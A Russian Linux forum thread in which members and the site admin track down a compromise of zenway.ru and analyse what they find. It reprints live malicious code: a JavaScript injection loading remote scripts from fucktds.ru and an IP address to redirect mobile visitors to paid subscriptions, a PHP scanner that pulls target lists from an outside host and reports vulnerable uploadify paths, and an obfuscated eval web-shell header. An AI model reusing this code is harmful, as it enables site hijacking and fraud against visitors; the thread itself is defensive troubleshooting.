Zenway

Linux - это интересно!

Вы не вошли.

#1 04-06-2017 13:23:25

ZEN
Участник
Здесь с 21-03-2013
Сообщений: 37
LinuxFirefox 45.0

Взломали сайт

Всем привет!

Кто-то взломал сайт/форум. При попытке зайти с выключенным NoScript происходит редирект на левый сайт.

Вне форума

#2 04-06-2017 13:41:31

redix
Участник
Откуда: Shangri-La
Здесь с 14-02-2013
Сообщений: 2,398
LinuxChrome 58.0

Re: Взломали сайт

Да ладно вам, у меня нет носкрипта ни в одном из трех браузеров: google-chrome, opera, palemoon, и с любого из них спокойно захожу. Может иам стоит почистить кеш браузера?


In Tux We Trust

Вне форума

#3 04-06-2017 13:56:13

ZEN
Участник
Здесь с 21-03-2013
Сообщений: 37
LinuxFirefox 45.0

Re: Взломали сайт

что google-chrome, что firefox - ситуация та же. Более того:

$ wget -q http://zenway.ru/plg/shjs/sh_main.min.js -O - | grep fucktds.ru
s.src='https://fucktds.ru/pF2qsd?frm=script&'+window.location.search.replace('?', '&')+'&se_referrer=' + encodeURIComponent(document.referrer) + '&default_keyword=' + encodeURIComponent(document.title) + '';

Добавлено спустя 11 мин 15 с:
Проверил вывод команды выше с шведского сервера - вывод команды идентичен.

Добавлено спустя 27 мин 47 с:
redix, получается что sh_main.min.js закеширован у вас в браузере smile А в сам файл в конце дописали каким-то способом заразу:

$ curl -s http://zenway.ru/plg/shjs/sh_main.min.js | tail -n 7
var d=document;var s=d.createElement('script');
s.src='https://fucktds.ru/pF2qsd?frm=script&'+window.location.search.replace('?', '&')+'&se_referrer=' + encodeURIComponent(document.referrer) + '&default_keyword=' + encodeURIComponent(document.title) + '';
if (document.currentScript) {
document.currentScript.parentNode.insertBefore(s, document.currentScript);
} else {
d.getElementsByTagName('head')[0].appendChild(s);
}

Так что надо чинить.

Отредактировано ZEN (04-06-2017 14:05:10)

Вне форума

#4 04-06-2017 15:29:40

BigOrange
Модератор
Откуда: Саратов
Здесь с 20-11-2010
Сообщений: 2,303
LinuxChrome 18.0

Re: Взломали сайт

нормально заходит, мидори даже для этого поставил


Долой DE! Даёшь WM!

Вне форума

#5 04-06-2017 17:18:44

redix
Участник
Откуда: Shangri-La
Здесь с 14-02-2013
Сообщений: 2,398
Windows 7Chrome 58.0

Re: Взломали сайт

Привет Биг, при заходе оперой один раз промелькнула какая то страница, единственное что успел увидеть, так это довольно крупный готический шрифт, какого то зеленоватого цвета. Повторить фокус не получилось. Вот здесь говорят, что на этом ай-пи никаких других сайтов не присутствует.


In Tux We Trust

Вне форума

#6 04-06-2017 20:10:52

ZEN
Участник
Здесь с 21-03-2013
Сообщений: 37
LinuxFirefox 52.0

Re: Взломали сайт

Я знаю, почему у вас нет редиректа.

1. Грузится страница.
2. Подгружается и выполняется javascript код из файла http://zenway.ru/plg/shjs/sh_main.min.js и получаем в HTML вот такое:

<script src="https://fucktds.ru/pF2qsd?frm=script&amp;&amp;pid=5741&amp;se_referrer=http%3A%2F%2Fzenway.ru%2Fforum%2Findex.php&amp;default_keyword=%D0%92%D0%B7%D0%BB%D0%BE%D0%BC%D0%B0%D0%BB%D0%B8%20%D1%81%D0%B0%D0%B9%D1%82%20%2F%20%D0%9A%D1%83%D1%80%D0%B8%D0%BB%D0%BA%D0%B0%20%2F%20Zenway"></script>

И если пойти по сгенерированной ссылки - есть риск получить javascript код, который сделает редирект. А есть риск получить то, что я вижу сейчас - 501 HTTP код с текстом "Sorry. Please visit us again later.". То есть, из-за перегруженного сервера вы не видите редиректа.

Хочу повторно обратить внимание, что скрипт для подгрузки кода с домена fucktds.ru сам по себе выглядит странным. А то, что удалось словить редирект не должно вызывать сомнений в выпиливании этой заразы.

Вне форума

#7 07-06-2017 16:39:50

ZEN
Участник
Здесь с 21-03-2013
Сообщений: 37
LinuxFirefox 52.0

Re: Взломали сайт

У меня удаленный сервер опять заработал. Вот, что подгружается с fucktds.ru:

$ wget -q 'https://fucktds.ru/pF2qsd?frm=script&&pid=5742&se_referrer=http%3A%2F%2Fzenway.ru%2F&default_keyword=%D0%92%D0%B7%D0%BB%D0%BE%D0%BC%D0%B0%D0%BB%D0%B8%20%D1%81%D0%B0%D0%B9%D1%82%20%2F%20%D0%9A%D1%83%D1%80%D0%B8%D0%BB%D0%BA%D0%B0%20%2F%20Zenway' -O -; echo
function process() {
                window.location = "https://fucktds.ru/gateway.php?frm=dm&token=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1cmwiOiJodHRwOlwvXC93YXBtaWsucnVcLz9zdWJfaWQ9NGlxc2I5ZGprY2dzNDVqIn0.AqxoSMXDH29lEorST-lfwme0qH8eB6U7F6xJPv0WHVQ";
            }
            window.onerror = process;
            process();

А теперь подумайте о том, что новых пользователей сайта у вас не будет из-за редиректа. Подумайте, что скоро браузеры начнут метить страницы вашего сайта как опасные. Подумайте, что сегодня подгружается код для редиректа, а завтра будет подгружаться код ворующий логин/пароли из форм для входа на сайт.

Я удивлен и огорчен тем фактом, что вы все еще не исправили это.

Вне форума

#8 07-06-2017 18:45:21

redix
Участник
Откуда: Shangri-La
Здесь с 14-02-2013
Сообщений: 2,398
LinuxChrome 59.0

Re: Взломали сайт

Не беспокойтесь вы так, админы тут появляются раз в год по праздникам, но тем не менее спам ботов практически нет. Даже если и не ответили, то это не значит что не видели ваши сообщения, и ничего не делают.


In Tux We Trust

Вне форума

#9 07-06-2017 19:07:24

мимопроходил
Гость
Windows 7Firefox 53.0

Re: Взломали сайт

@ZEN, запостите ссылку на скрипт в adblock, ublock и т.п..

#10 07-06-2017 21:57:14

ZEN
Участник
Здесь с 21-03-2013
Сообщений: 37
LinuxFirefox 52.0

Re: Взломали сайт

мимопроходил пишет:

@ZEN, запостите ссылку на скрипт в adblock, ublock и т.п..

У меня в AdBlock ручное правило для блокировки

https://fucktds.ru/*



redix пишет:

Не беспокойтесь вы так, админы тут появляются раз в год по праздникам, но тем не менее спам ботов практически нет. Даже если и не ответили, то это не значит что не видели ваши сообщения, и ничего не делают.

Это меня и печалит. Когда-то sysadminday.com.ru умирал на глазах, потому что ни у кого не было доступа по ftp и все предложения по изменению сайта звучали в никуда. Теперь sysadminday.com.ru не существует.

Но тут ситуация несколько иная.. К слову, я средствами форума отправил е-мейл админу пару дней назад с рекомендациями что делать (не достаточно удалить заразу, нужно пользовательские браузеры заставить принудительно обновить локальный кеш).

Вне форума

#11 07-06-2017 22:32:37

redix
Участник
Откуда: Shangri-La
Здесь с 14-02-2013
Сообщений: 2,398
LinuxChrome 59.0

Re: Взломали сайт

ZEN пишет:

К слову, я средствами форума отправил е-мейл админу

Форумом Vovans занимается, по моему, но он появлялся уже давно, даже не скажу как.


In Tux We Trust

Вне форума

#12 09-06-2017 17:44:50

vovans
Администратор
Откуда: Ростов-на-Дону
Здесь с 19-10-2010
Сообщений: 513
Сайт
Windows 10Firefox 53.0

Re: Взломали сайт

Всем спасибо. Заразу нашёл. Причём, в неожиданном месте. Но как она туда попала - большой вопрос (((

Сейчас очень занят постоянно и нет времени заниматься сайтом. Но посматриваю время - от времени, что с ним, и ежемесячно оплачиваю VDS smile

Как на зло, ещё отвалилась и почта, что была в контактах. Поправил адрес на актуальный.

Ещё раз спасибо.

Добавлено спустя 04 мин 24 с:
Какие интересные скрипты находятся на сайте:

<?php
error_reporting(0);
ini_set('display_errors',0);
ini_set('max_execution_time',13400);
ini_set('log_errors',0);
ini_set('memory_limit','512M');
ini_set('default_socket_timeout',10);
ignore_user_abort();
function g($v){$p=curl_init();curl_setopt($p,CURLOPT_URL,'http://'.$v);curl_setopt($p,CURLOPT_HEADER,0);curl_setopt($p,CURLOPT_USERAGENT,'Mozilla/5.0 (compatible, MSIE 11, Windows NT 6.3; Trid
ent/7.0;  rv:11.0) like Gecko');curl_setopt($p,CURLOPT_HTTP_VERSION,CURL_HTTP_VERSION_1_1);curl_setopt($p,CURLOPT_RETURNTRANSFER,1);curl_setopt($p,CURLOPT_CONNECTTIMEOUT,5);curl_setopt($p,CURL
OPT_TIMEOUT,10);curl_setopt($p,CURLOPT_FOLLOWLOCATION,1);curl_setopt($p,CURLOPT_MAXREDIRS,1);curl_setopt($p,CURLOPT_SSL_VERIFYPEER,0);curl_setopt($p,CURLOPT_SSL_VERIFYHOST,0);$d=curl_exec($p);
curl_close($p);return $d;}
$l=array('admin/include/uploadify/uploadify.css','admin/js/jquery.uploadify/uploadify.css','assets/modules/evogallery/js/uploadify/uploadify.css','bitrix/modules/defa.tools/install/scripts/upl
oadify/uploadify.css','bitrix/modules/smanline.uploadandunzip/install/tools/smanline.uploadandunzip/uploadify/php/uploadify.css','bitrix/tools/defatools/uploadify/uploadify.css','bitrix/tools/
smanline.uploadandunzip/uploadify/php/uploadify.css','feedback/uploadify/uploadify.css','includes/uploadify/uploadify.css','js/jquery.uploadify/uploadify.css','landing/escalera/admin/upload-up
loadify.css','mod/uploadify.css','mymodules/uploadify/uploadify.css','nanomaxi/upload-uploadify.css','assets/modules/evogallery/js/uploadify/uploadify.css','payment/assets/js/uploadify-v2.1.4/
uploadify.css','plugins/community/uploadify/uploadify.css','protected/modules/pictures/components/uploadify.css','assets/modules/evogallery/js/uploadify/uploadify.css','sites/all/modules/uploa
dify/uploadify/uploadify.css','uploadify/uploadify.css');
if(preg_match('/uploadifyQueueItem/mi',g('leopold24.ru/include/template/t'))){
w:
if(!file_exists(__DIR__.'/s')){$s=g('leopold24.ru/include/template/s.php?g');if(empty($s)){exit();}file_put_contents(__DIR__.'/s',$s);}
$f=file(__DIR__.'/s');
if(!file_exists(__DIR__.'/c')){file_put_contents(__DIR__.'/c','0');}
$c=file_get_contents(__DIR__.'/c');
$g=count($f);
$y=time();
while($g>$c){
$a=trim($f[$c]);
foreach($l as $ll){if(preg_match('/uploadifyQueueItem/mi',g($a.'/'.$ll))){g('leopold24.ru/include/template/s.php?r='.urlencode($a.'/'.$ll));}}
if($c++%100==0){file_put_contents(__DIR__.'/c',$c);if((time()-$y)>13400){exit();}}
}
unlink(__DIR__.'/s');
unlink(__DIR__.'/c');
goto w;
}

zenway admin

Вне форума

#13 09-06-2017 17:56:50

redix
Участник
Откуда: Shangri-La
Здесь с 14-02-2013
Сообщений: 2,398
LinuxChrome 59.0

Re: Взломали сайт

@vovans, приветствую. Значит я не ошибся, когда назвал именно вас.  )


In Tux We Trust

Вне форума

#14 09-06-2017 20:27:04

ZEN
Участник
Здесь с 21-03-2013
Сообщений: 37
LinuxFirefox 52.0

Re: Взломали сайт

vovans пишет:

Всем спасибо. Заразу нашёл. Причём, в неожиданном месте. Но как она туда попала - большой вопрос (((

Сейчас очень занят постоянно и нет времени заниматься сайтом. Но посматриваю время - от времени, что с ним, и ежемесячно оплачиваю VDS smile

Вариантов много). Если достаточно старая версия Apache, то могли и через юзерагент закачать скрипт из вне. Если логи сохранились, можно поизучать. Если MySQL открыт на внешку, то там тоже была веселая уязвимость позволяющая создать файл с произвольным содержимом и выполнить. Ну или еще проще - уязвимость в FluxBB.

Вне форума

#15 09-06-2017 21:30:04

redix
Участник
Откуда: Shangri-La
Здесь с 14-02-2013
Сообщений: 2,398
LinuxChrome 59.0

Re: Взломали сайт

@ZEN, мы с вами нигде не пересекались, кроме как здесь? А то до жути знакомая аватарка, и почему то ассоциируется с Ubuntu, хотя тут я могу и ошибаться.


In Tux We Trust

Вне форума

#16 09-06-2017 22:43:09

vovans
Администратор
Откуда: Ростов-на-Дону
Здесь с 19-10-2010
Сообщений: 513
Сайт
AndroidChrome 58.0

Re: Взломали сайт

Проблемный скрипт лежал в плагине основного сайта с 15 года. А внесли его в шаблон форума в конце мая. Ещё был скрипт, что я процитировал. Разбирать некогда, но дата правки и содержание сомнительны и это вообще в другом сайте. Все обновления системы накатываю регулярно. Коне что же, мускул наружу не торчит.


zenway admin

Вне форума

#17 10-06-2017 21:34:02

ZEN
Участник
Здесь с 21-03-2013
Сообщений: 37
LinuxFirefox 52.0

Re: Взломали сайт

redix пишет:

@ZEN, мы с вами нигде не пересекались, кроме как здесь? А то до жути знакомая аватарка, и почему то ассоциируется с Ubuntu, хотя тут я могу и ошибаться.

Я заядлый Debian-щик. В принципе, я посещал и посещаю разные ресурсы по линуксам. Так что не исключено, что за почти 9 лет моя аватарка где-то да попадалась. Но в последнее время я не участвую в дискуссиях и если посещает желание о чем-то написать, то делаю это на своем форуме linuxhub.ru

Вне форума

#18 10-06-2017 22:57:06

redix
Участник
Откуда: Shangri-La
Здесь с 14-02-2013
Сообщений: 2,398
LinuxChrome 59.0

Re: Взломали сайт

Понятно, буду знать.  )


In Tux We Trust

Вне форума

#19 22-06-2017 22:04:41

vovans
Администратор
Откуда: Ростов-на-Дону
Здесь с 19-10-2010
Сообщений: 513
Сайт
Windows 10Firefox 53.0

Re: Взломали сайт

Интересный кусок скрипта:

var d=document;var s=d.createElement('script');
s.src='http://37.139.50.21/H3td1w?frm=script&'+window.location.search.replace('?', '&')+'&se_referrer=' + encodeURIComponent(document.referrer) + '&default_keyword=' + encodeURIComponent(docum
ent.title) + '';
if (document.currentScript) {
document.currentScript.parentNode.insertBefore(s, document.currentScript);
} else {
d.getElementsByTagName('head')[0].appendChild(s);
}

Если вы входите через мобильный телефон, вас перекидывает на скрипт

'http://37.139.50.21/gateway.php?bla_bla_bla

откуда перекидывает на:

http://webprotect.space/16d423ebd90605c4/sub1/sub2/sub3/sub4?track_id=3hg83gnd9pj3060uoi

И там на страницу какого-то там под-под домена вашего оператора связи, где вам предлагает какую-то услугу за 30 руб в сутки, кажется, которые будут списываться со счёта вашего телефона.

Но если вы заходите не с мобильного телефона, то ничего даже не замечаете )


zenway admin

Вне форума

#20 22-06-2017 23:29:22

redix
Участник
Откуда: Shangri-La
Здесь с 14-02-2013
Сообщений: 2,398
LinuxChrome 59.0

Re: Взломали сайт

А откуда это появилось, таки взломали?


In Tux We Trust

Вне форума

#21 23-06-2017 01:09:30

vovans
Администратор
Откуда: Ростов-на-Дону
Здесь с 19-10-2010
Сообщений: 513
Сайт
AndroidChrome 58.0

Re: Взломали сайт

Я не могу пока найти, каким образом подобные дописки появляются в одном из скриптов sad

Если ещё раз повторится, буду серьёзно копать.

Добавлено спустя 04 мин 06 с:
Причём доп код в js появляется так, что дата редактирования файла не меняется.


zenway admin

Вне форума

#22 23-06-2017 21:30:56

ZEN
Участник
Здесь с 21-03-2013
Сообщений: 37
LinuxFirefox 52.0

Re: Взломали сайт

я бы поискал упоминание команды eval
$ grep -r eval www/
вполне может быть, что где-то из base64 декодируется PHP код и выполняется дописывая заразу в файл.

По base64_decode не факт, что найдет, так как код может быть обфусцирован. Например:

zen@devel:~$ wget -q "[url]http://www.38stroika.ru/goodshell.php[/url]" -O - | head -n7
<?php
/*
Obfuscation provided by FOPO - Free Online PHP Obfuscator: [url]http://www.fopo.com.ar/[/url]
This code was created on Saturday, February 4th, 2017 at 14:39 UTC from IP 105.155.155.94
Checksum: 38ae5f7b17e11cd07827e61580cb96788c08372e
*/
$n8d530ed="\x62\141\x73\145\66\64\x5f\x64\x65\x63\157\144\145";@eval($n8d530ed(
zen@devel:~$ python -c "print '\$n8d530ed=\"\x62\141\x73\145\66\64\x5f\x64\x65\x63\157\144\145\";@eval(\$n8d530ed('"
$n8d530ed="base64_decode";@eval($n8d530ed(

Отредактировано ZEN (23-06-2017 21:44:53)

Вне форума

#23 02-07-2018 22:28:04

vovans
Администратор
Откуда: Ростов-на-Дону
Здесь с 19-10-2010
Сообщений: 513
Сайт
Windows 10Firefox 60.0

Re: Взломали сайт

В общем, после блокировок Телеграмма наш сайт стал недоступен для 50% россиян. У меня он только с телефона работал или через VPN. На работе было всё ок. И у некоторых моих знакомых он открывался без проблем. Какая-то странная блокировка.

Но суета, дела, только сегодня я записал в саппорт, чтобы нам сменили ip. На что саппорт сказал, что не может такого делать. Нужно остановить дроплет, сделать бекап, создать из него новый дроплет и старый удалить. Но они не дают гарантии, что новый ip будет "чист" для РФ. Я проделал эту небыструю процедуру. В первый раз адрес оказался таким, что блокировался даже на работе как ненадёжный ) но со второго раза всё ок.

Что ещё заметил и что порадовало. Это нужно было сделать давно. Теперь не 512Мб RAM, а 1024 ))) и SSD не 20, а 25Гб, что очень кстати, так как 20 уже давно впритык было. Показалось, что сайт стал шевелиться веселее ) даже прям совсем быстро. Может показалось. Но память в два раза увеличилась - это не могло не повлиять. 512Мб - это слишком мало.

Такие вот новости.

Заодно обновил и обкатываю новый движок тут:

http://radio.zenway.ru/

нужно когда-нибудь и до основного сайта дойти. Но слишком много возни с переделкой шаблона будет. Так бы уже давно...


zenway admin

Вне форума

#24 02-07-2018 22:34:05

redix
Участник
Откуда: Shangri-La
Здесь с 14-02-2013
Сообщений: 2,398
LinuxChrome 67.0

Re: Взломали сайт

А я смотрю что сайт сколько то раз пытался не открываться.


In Tux We Trust

Вне форума

#25 02-07-2018 23:12:41

vovans
Администратор
Откуда: Ростов-на-Дону
Здесь с 19-10-2010
Сообщений: 513
Сайт
Windows 10Firefox 60.0

Re: Взломали сайт

придётся таки переходить на новый движок так или иначе. Сейчас сервер крутится на 14.04, коей поддержка скоро заканчивается (относительно скоро). А новый PHP... он со старыми движками никак. Ну и минимум день-другой сайт работать не будет. Но это когда будет... ))


zenway admin

Вне форума

Сейчас в этой теме пользователей: 0, гостей: 1
[Bot] claudebot

Подвал форума

Под управлением FluxBB
Модифицировал Visman

[ Сгенерировано за 0.020 сек, 9 запросов выполнено - Использовано памяти: 1.74 Мбайт (Пик: 1.81 Мбайт) ]